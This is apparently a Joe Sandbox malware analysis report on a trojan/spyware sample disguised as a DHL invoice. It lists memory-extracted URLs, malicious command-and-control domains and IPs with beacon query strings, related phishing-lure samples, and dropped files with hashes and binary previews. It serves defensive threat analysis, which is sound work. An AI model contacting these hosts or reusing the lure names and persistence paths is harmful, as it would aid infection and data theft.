http://www.icq.com/people	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
http://pidgin.im/aim_data.php3--that	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
https://android.notify.windows.com/iOS	explorer.exe, 0000000A.00000000.18448469262.0000000010557000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.icq.com/whitepages/user_details.php	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
http://mymobile.aol.com/dbreg/register?action=imf&clientID=1	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
http://www.guvnorsnyc.com/	WWAHost.exe, 00000005.00000002.22580041012.00000000054F8000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppD	explorer.exe, 0000000A.00000000.18245249975.000000000C7E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18372722434.000000000C7E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18433650004.000000000C7E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18496415722.000000000C7E6000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/trump-sues-new-york-times-and-niece-mary-trump-over-tax-reco	explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000000.18255998138.000000000CE0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18503819716.000000000CE0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18441217767.000000000CE0E000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.instagram.com/hover_domains	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://outlook.com:Tue:Tn	explorer.exe, 0000000A.00000000.18257225462.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18381242780.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18504924350.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442076455.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://pidgin.im/aim_data.php3?offset=%ld&len=%ld&modname=%s	liboscar.dll.1.dr	false		high
https://wns.windows.com/ClassId	explorer.exe, 0000000A.00000000.18511467479.0000000010519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18266261425.0000000010519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18386850230.0000000010519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18448148313.0000000010519000.00000004.00000001.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_flash	WWAHost.exe, 00000005.00000002.22582900822.0000000008719000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mymobile.aol.com/dbreg/register?action=imf&clientID=1http://www.icq.com/whitepages/user_detai	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
http://schemas.micro	explorer.exe, 0000000A.00000000.18410517135.0000000000B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.18368632762.000000000A230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.18240824754.000000000A9B0000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/email?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.hover.com/about?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/democratic-support-for-supreme-court-plummets-after-decision	explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/dotnet/runtime	DHL-INVOICE-MBV.exe, 00000001.00000003.17542927393.0000000002913000.00000004.00000800.00020000.00000000.sdmp, System.Runtime.Extensions.dll.1.dr	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	DHL-INVOICE-MBV.exe, 00000003.00000001.17791100936.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/domains/results	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc	WWAHost.exe, 00000005.00000002.22580951493.0000000005CD2000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://rahaingoadvice.com/d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2	WWAHost.exe, 00000005.00000002.22579741645.00000000051D4000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3.o	explorer.exe, 0000000A.00000000.18352820555.0000000002DEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18221172015.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/tools?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.cccre8ive.com/h	DHL-INVOICE-MBV.exe, 00000003.00000002.18128327162.0000000001841000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.icq.net/aim/startOSCARSession	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
https://www.hover.com/privacy?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://crash-reports.mozilla.com/submit?id=	WWAHost.exe, 00000005.00000003.18734956473.000000000922F000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	false		high
https://www.hover.com/transfer_in?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://aka.ms/odirmwB	explorer.exe, 0000000A.00000000.18485911004.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18232387000.000000000914F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJT	WWAHost.exe, 00000005.00000002.22578871826.00000000049FA000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.140.149.212	www.budgaugh.com	United States	62904	EONIX-COMMUNICATIONS-ASBLOCK-62904US	true
51.91.236.193	www.rahaingoadvice.com	France	16276	OVHFR	true
207.60.131.46	www.driftreiki.com	United States	174	COGENT-174US	true
162.0.238.95	www.yumfechy.online	Canada	22612	NAMECHEAP-NETUS	true
76.223.105.230	christophersubala.online	United States	16509	AMAZON-02US	true
198.252.105.91	legaldanaa.com	Canada	20068	HAWKHOSTCA	true
154.221.20.121	www.donglinwangluo.site	Seychelles	133115	HKKFGL-AS-APHKKwaifongGroupLimitedHK	true
74.208.236.144	www.migrationtask.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
3.64.163.50	www.guvnorsnyc.com	United States	16509	AMAZON-02US	true
162.214.80.106	creotopi.biz	United States	46606	UNIFIEDLAYER-AS-1US	true
202.5.16.67	cccre8ive.com	United States	7489	HOSTUS-GLOBAL-ASHostUSHK	false
64.64.242.59	www.7o0i.com	Canada	25820	IT7NETCA	true
89.31.143.1	www.altruista.one	Germany	15598	QSC-AG-IPXDE	true
103.20.200.97	bondiev.com	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
188.114.96.3	www.pnpg.hair	European Union	13335	CLOUDFLARENETUS	true
162.241.217.234	sbgfoundation.net	United States	46606	UNIFIEDLAYER-AS-1US	true
2.57.90.16	mnrinstitutes.com	Lithuania	47583	AS-HOSTINGERLT	true
216.40.34.41	www.motorizedchess.com	Canada	15348	TUCOWSCA	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	730960
Start date and time:	2022-10-26 13:11:43 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DHL-INVOICE-MBV.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/6@20/18
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 21.3% (good quality ratio 20.5%) Quality average: 77.4% Quality standard deviation: 25%
HCA Information:	Successful, ratio: 99% Number of executed functions: 133 Number of non-executed functions: 102
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.140.149.212	Technical Specification.exe	Get hash	malicious	Browse	www.budgaugh.com/d0ad/?i4UD_8Q=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&XXs=t44pwN9pJ4sXY2pp
51.91.236.193	Technical Specification.exe	Get hash	malicious	Browse	www.rahaingoadvice.com/d0ad/?i4UD_8Q=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&XXs=t44pwN9pJ4sXY2pp
	sample and order.exe	Get hash	malicious	Browse	www.rahaingoadvice.com/hlpq/?n850d4p=xbQh45fnCifDgAU6IZIPJtLYD3+FJWSf21PzgzbtUdNs7wRy2HR/T+SkBX294nvCy4tuWpxUW3ML8zZpLjeDHAMYplXgzzWMpN92wAatjK3n&V6AX=zVPHVPS
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	www.avisexpert.online/as31/?j6ATY828=aUJJDdwZtkjs2V92HK4vs4e4SKnLmkqXh9nRIs2DSWlugT/7/cae1v7NyNAABhD7kGHs&TjlPF=FxolCVU0UJKLH
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	www.avisexpert.online/as31/?kN9xb=5jiX_hoXSns&R878AVd=aUJJDdwZtkjs2V92HK4vs4e4SKnLmkqXh9nRIs2DSWlugT/7/cae1v7NyOg6RwjD+hmr
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	www.avisexpert.online/as31/?2db=aUJJDdwZtkjs2V92HK4vs4e4SKnLmkqXh9nRIs2DSWlugT/7/cae1v7NyNAABhD7kGHs&t6Ahe8=mR-0s2hXKbw
	Quotation-RFQ-HL51L05.doc	Get hash	malicious	Browse	www.eclox-btp.com/r0bh/?bXrDP=hizki/SFPh3fnMfTVDepWs4H3x0rGrCEl/PBTnJMc7i1FBWstzMg5jPKSKNJAKB6wrdLzg==&8pUpTv=1bMpNnh8Ozn4
	HYmN4qwdBc.exe	Get hash	malicious	Browse	www.avosmains.net/b6a4/?0vW8G=V0Gl-ZsPS6VDz6&A8=fnknWrD2NhqgrQvaIAipQLAFTJVgH0ny4A44zkzid8TpbhuneuQLaT8O5lUboUnUY0r5
	4zfdibTbxl.exe	Get hash	malicious	Browse	www.plannyo.com/utrf/?S6AP-VIP=Qwk1FDSK0E28edLajyhRIQlD2CTes1JZxTqAIf4KRrzlfBtoGzt46tbHp99C/qqLAYqV&c4mL=3fNp6H5p7hkHJn
	REQUEST FOR QUOTATION.xlsx	Get hash	malicious	Browse	www.chloeallgeyer.com/att3/?xv8TZfM=6LVIA3Qx0f7ST9YU5GYllMyUBBophEkUCm7nGKpHNtKVtp3+Y0Ckw1T1skvSZIoy4+KIrg==&2d=D4QHjpLxgZF
	PO.exe	Get hash	malicious	Browse	www.sat-tones.com/ubuq/?lT=LHhxOtJ0dna4&3fF0v=dueCk9B+wirRM6gcCw6JY8HDa0GhNzCJ1QVJyiddKWMWiot+tNZE7n7sp3io+MtIolUb
	URGENT REQUEST FOR QUOTATION (RFQ REF R2100131410).exe	Get hash	malicious	Browse	www.jeremypohu.com/dp3a/?u6UPH=XbuDZ&-ZP=aIlR6aZfUPsTMzApDqKe2UMV5s5+RUyTx0O5AHsZo6Gdh4uz6RtsBtoRk2DKN52vpKIv
	Order.exe	Get hash	malicious	Browse	www.bhv-brasseriehoteldeville.com/jogt/?w6ATB0=ljCXkLt82SKdYfkqC1JAUH5PLdwgwsLrwbokQ3gF8W/pxtZwBvFv9/yJUgYw8d07vh7G&Jxox=Er6tXhMxl
	PO 4500151298.exe	Get hash	malicious	Browse	www.jeremypohu.com/dp3a/?VrbDp=aIlR6aZfUPsTMzApDqKe2UMV5s5+RUyTx0O5AHsZo6Gdh4uz6RtsBtoRk1jwdoWXztpo&y0Dt=r0D0w8
	Purchase Order #330716.exe	Get hash	malicious	Browse	www.seamtube.com/hfg/?YX=9rilVPmhrlHhAh&wXY=F/zUeXLsEs9qpWEXEKwirn9V0B4gmSU6CEsfymdFrAu2oZ/U0QQx7eDxwsfp/nqWX77N
	F75YrsCX7k.exe	Get hash	malicious	Browse	www.elia-lca.com/gtl/?ndndiH=9r9xbvDXEXgx&AjR=M3kKu8XELtRlrDTuyv1yr+cusSju67zb5OU7zMXm9bIUyPCgpWGqqTZIpo97Owf/mFHV
	ORDER INQUIRY.exe	Get hash	malicious	Browse	www.salon-massage-linit.com/sbmh/?uTix=M4Bx&h0D0gtS=ZydmT4v40lKxTp3oOSyELLcLVJ3RL8FWs7jdvFsPtW0yQjWFRrxKfQf1NUjwEIkvZB+3

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.motorizedchess.com	Technical Specification.exe	Get hash	malicious	Browse	216.40.34.41
www.guvnorsnyc.com	Technical Specification.exe	Get hash	malicious	Browse	3.64.163.50
www.driftreiki.com	HSBC22-HE01.exe	Get hash	malicious	Browse	207.60.131.46
www.driftreiki.com	Technical Specification.exe	Get hash	malicious	Browse	207.60.131.46
www.pnpg.hair	Technical Specification.exe	Get hash	malicious	Browse	188.114.96.3
www.donglinwangluo.site	Technical Specification.exe	Get hash	malicious	Browse	154.221.20.121
www.rahaingoadvice.com	Technical Specification.exe	Get hash	malicious	Browse	51.91.236.193
www.rahaingoadvice.com	sample and order.exe	Get hash	malicious	Browse	51.91.236.193

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
EONIX-COMMUNICATIONS-ASBLOCK-62904US	OCEAN GEMSTONE - VSL PARTICULARS.exe	Get hash	malicious	Browse	173.232.203.98
	texttext553642.exe	Get hash	malicious	Browse	173.232.118.252
	Technical Specification.exe	Get hash	malicious	Browse	104.140.149.212
	http://cdn.examhome.net	Get hash	malicious	Browse	173.232.88.11
	http://cdn.examhome.net	Get hash	malicious	Browse	173.232.88.11
	7EZcMORI33.elf	Get hash	malicious	Browse	173.232.154.242
	RFx 5500501976.xll	Get hash	malicious	Browse	104.140.250.197
	d2gSnYAZ8t.elf	Get hash	malicious	Browse	104.140.201.25
	PO 0002928828992.vbs	Get hash	malicious	Browse	173.44.176.56
	XCZ1QEKffQ.apk	Get hash	malicious	Browse	104.206.122.62
	DHL EXPRESS LEVERINGSBERICHT VOOR,pdf.exe	Get hash	malicious	Browse	170.130.52.143
	http://www.iyogiblog.com	Get hash	malicious	Browse	50.3.117.104
	Documents.xlsx.xll	Get hash	malicious	Browse	170.130.52.143
	0Zl49D97cK.elf	Get hash	malicious	Browse	107.158.106.195
	goAgPi645X.elf	Get hash	malicious	Browse	170.130.207.244
	AZMuJBHzLe.elf	Get hash	malicious	Browse	173.232.3.179
	ka6rCmpBqI.elf	Get hash	malicious	Browse	23.231.52.193
	97070.exe	Get hash	malicious	Browse	104.206.129.167
	1.PARTICULARS.I.exe	Get hash	malicious	Browse	173.232.203.98
	OCTOBER PURCHASE PDF...exe	Get hash	malicious	Browse	107.158.161.49
OVHFR	file.exe	Get hash	malicious	Browse	5.135.247.111
	PAYMENT COPY.js	Get hash	malicious	Browse	51.75.209.245
	RFQ-IMP 90881-00.js	Get hash	malicious	Browse	51.195.83.138
	DOC.js	Get hash	malicious	Browse	51.195.83.138
	Banka odeme havalesi bilgileri TL9850900 20222510.exe	Get hash	malicious	Browse	142.4.204.181
	https://l.facebook.com/l.php?u=https%3A%2F%2Fcutt.ly%2FYBn3c9y%3Ffbclid%3DIwAR2PHCiRHrbXtHZ1rnYVQACIi99KpFW9KwBdAcw5Ie1BKy-wirpqoKgLTKo&h=AT1A5FeSltT1aaF40Zu0EB6m_wBw50ZWaeQSs1pXr0cL3lC7vOh1NQGT8AC4a04pLN8a5iC5pQOrlm_EEA4ALD0xdxqVOInfw1S1Kk5AxlymYfzZwqW31YW7wUd4x_N2d2Tp&__tn__=-UK-R&c%5B0%5D=AT05OhFkDWWqE11G3K3S-UfKDLWjkQUX2Mt_9-hSIUHBMgNWCmWQPg9OFPsiaol7ghx48Ww2nELQMJwLUhMZnwiimlvF_HIyR9YHWIhVs7h-iGIXWLqy5TbUDIktNVFAYHyxYaUSLMSHbLqyC96ySu2brWUkbjGEd8LDawRDOSyqhy_nf32mtw	Get hash	malicious	Browse	87.98.154.146
	https://gruppoalpinicolere.it/cli/ok/Onedrive.html	Get hash	malicious	Browse	51.210.32.106
	#U260e#Ufe0f E-Fax-Invoice.htm	Get hash	malicious	Browse	51.68.36.8
	382CC180516898230A242E80456EF81647D83A9D2EDB8.exe	Get hash	malicious	Browse	51.195.166.180
	file.exe	Get hash	malicious	Browse	51.89.201.21
	RFQ No. 01.300.TRGVH.exe	Get hash	malicious	Browse	51.75.209.245
	PAYMENT COPY.exe	Get hash	malicious	Browse	51.75.209.245
	52E27A4EBEE3E1493A18018565B505353E84EB5FCDDE9.exe	Get hash	malicious	Browse	5.135.247.111
	1A292CC8DA0DBDC4608018679F60E2EEB070C06374FDD.exe	Get hash	malicious	Browse	51.195.77.252
	DFAF9FE4937AB169D48157BAE84DEF3DD608A21E93390.exe	Get hash	malicious	Browse	51.195.77.252
	i8YtYzXV93.exe	Get hash	malicious	Browse	5.135.247.111
	Spec.exe	Get hash	malicious	Browse	92.222.212.65
	https://t.co/1FjADFyzYi	Get hash	malicious	Browse	46.105.201.240
	WinUpdate.bin.exe	Get hash	malicious	Browse	51.68.137.66
	tmp2689.tmpv08zqg7iwji.bin.exe	Get hash	malicious	Browse	51.83.33.228

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll	DHL-INVOICE-MBV.exe	Get hash	malicious	Browse
	DETAILS AND INVOICES.exe	Get hash	malicious	Browse
	DETAILS AND INVOICES.exe	Get hash	malicious	Browse
	BL-INV-DHL.exe	Get hash	malicious	Browse
	BL-INV-DHL.exe	Get hash	malicious	Browse
	DHLINVMVB.exe	Get hash	malicious	Browse
	DHLINVMVB.exe	Get hash	malicious	Browse
	Pepsico LLC RFQ Information.exe	Get hash	malicious	Browse
	Pepsico LLC RFQ Information.exe	Get hash	malicious	Browse
	LLC_RFQ_Information.exe	Get hash	malicious	Browse
	LLC_RFQ_Information.exe	Get hash	malicious	Browse
	DHL-INV-MBV.exe	Get hash	malicious	Browse
	DHL-INV-MBV.exe	Get hash	malicious	Browse
	Group_Invitation.exe	Get hash	malicious	Browse
	HCM152611.exe	Get hash	malicious	Browse
	Group_Invitation.exe	Get hash	malicious	Browse
	HCM152611.exe	Get hash	malicious	Browse
	DHL-INVOICE-MBV.exe	Get hash	malicious	Browse
	DHL-INVOICE-MBV.exe	Get hash	malicious	Browse
	Transaccions DOC-REF DX739475.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\e216404J

Download File

Process:	C:\Windows\SysWOW64\WWAHost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1305327154874678
Encrypted:	false
SSDEEP:	192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
MD5:	D331C900DDE8ACB523C51D9448205C0A
SHA1:	BDB3366F54876E78F76A6244EDA7A4C302FEB91D
SHA-256:	F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
SHA-512:	415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.890541747176257
Encrypted:	false
SSDEEP:	192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
MD5:	75ED96254FBF894E42058062B4B4F0D1
SHA1:	996503F1383B49021EB3427BC28D13B5BBD11977
SHA-256:	A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
SHA-512:	58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2% Antivirus: Metadefender, Detection: 4%, Browse
Joe Sandbox View:	Filename: DHL-INVOICE-MBV.exe, Detection: malicious, Browse Filename: DETAILS AND INVOICES.exe, Detection: malicious, Browse Filename: DETAILS AND INVOICES.exe, Detection: malicious, Browse Filename: BL-INV-DHL.exe, Detection: malicious, Browse Filename: BL-INV-DHL.exe, Detection: malicious, Browse Filename: DHLINVMVB.exe, Detection: malicious, Browse Filename: DHLINVMVB.exe, Detection: malicious, Browse Filename: Pepsico LLC RFQ Information.exe, Detection: malicious, Browse Filename: Pepsico LLC RFQ Information.exe, Detection: malicious, Browse Filename: LLC_RFQ_Information.exe, Detection: malicious, Browse Filename: LLC_RFQ_Information.exe, Detection: malicious, Browse Filename: DHL-INV-MBV.exe, Detection: malicious, Browse Filename: DHL-INV-MBV.exe, Detection: malicious, Browse Filename: Group_Invitation.exe, Detection: malicious, Browse Filename: HCM152611.exe, Detection: malicious, Browse Filename: Group_Invitation.exe, Detection: malicious, Browse Filename: HCM152611.exe, Detection: malicious, Browse Filename: DHL-INVOICE-MBV.exe, Detection: malicious, Browse Filename: DHL-INVOICE-MBV.exe, Detection: malicious, Browse Filename: Transaccions DOC-REF DX739475.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22\liboscar.dll

Download File

Process:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315811
Entropy (8bit):	6.2422060351450614
Encrypted:	false
SSDEEP:	6144:6cXM/De4unKXv4iqhUc/EfyCarKR6pNMx53dekMyap:6cXKDe2XLgEfSrwt/ap
MD5:	C3478F9EEF7CFABC6BE55633BE2EF30F
SHA1:	6F4002BC71746290FB6A38BD38C205F22BD29BED
SHA-256:	71A27640A2B3FFA84C8D90C3621C9638C290D179BA996A004C13B4FA2F11067F
SHA-512:	24EEA221F172119739F004079A65E8BCA400B40F80E0E428EA7880614184AA806E3B979102CB3ECE225232F8AEC4948DA80AC7157994C12D331E040897E1E87C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..."............`..............h......................................@... ......................0..s&...`...9...............................!...................................................f..(............................text...X...........................`.P`.data...D...........................@.`..rdata..............................@.`@/4.......m.......n..................@.0@.bss......... ........................`..edata..s&...0...(..................@.0@.idata...9...`...:...(..............@.0..CRT.................b..............@.0..tls.... ............d..............@.0..reloc...!......."...f..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\AutoConnectHelper.exe

Download File

Process:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	37552
Entropy (8bit):	6.179581948931567
Encrypted:	false
SSDEEP:	768:ToPOLj8Ylx5VlMHrRQ39jBDDZ4Syh/+ucccOAhJ:P7lXMNS9jZVu/+ucI4
MD5:	1AD4FBD790D3C474055C2559A634F9B5
SHA1:	424D92D08D9EA5DB311EC0B5ED3522EC691E6584
SHA-256:	4107A546E3A7206091D15B368DF14236099B38356BCD834680CD5F7931621AA8
SHA-512:	A4870F4039E97DBDA21B5C12C421C91947965A22C0C88217CE9CA24F1B8A68B4FE21193676A64D188E20AFD38D14F019462EC01D050A5274E43944E5AD094C0A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.`.........."...0..l............... ........@.. ..............................\$....`.....................................O....................v..............l................................................ ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B.......................H.......LB...B......6...$...H...........................................n~.....o....,.~.....o.....J.s....}.....(....f.s....}.....(......(........0..j........{..........( ....{....o!....+'..(".....{......(#......($...(....o%.....(&...-...........o'.....,..((..............4Q..........V_.......0..,........{..........( ....{.....o).......,..((.............. .......0..+........{..........( ....{......o%......,..((.............. .......0.............{..........( ....{.....o

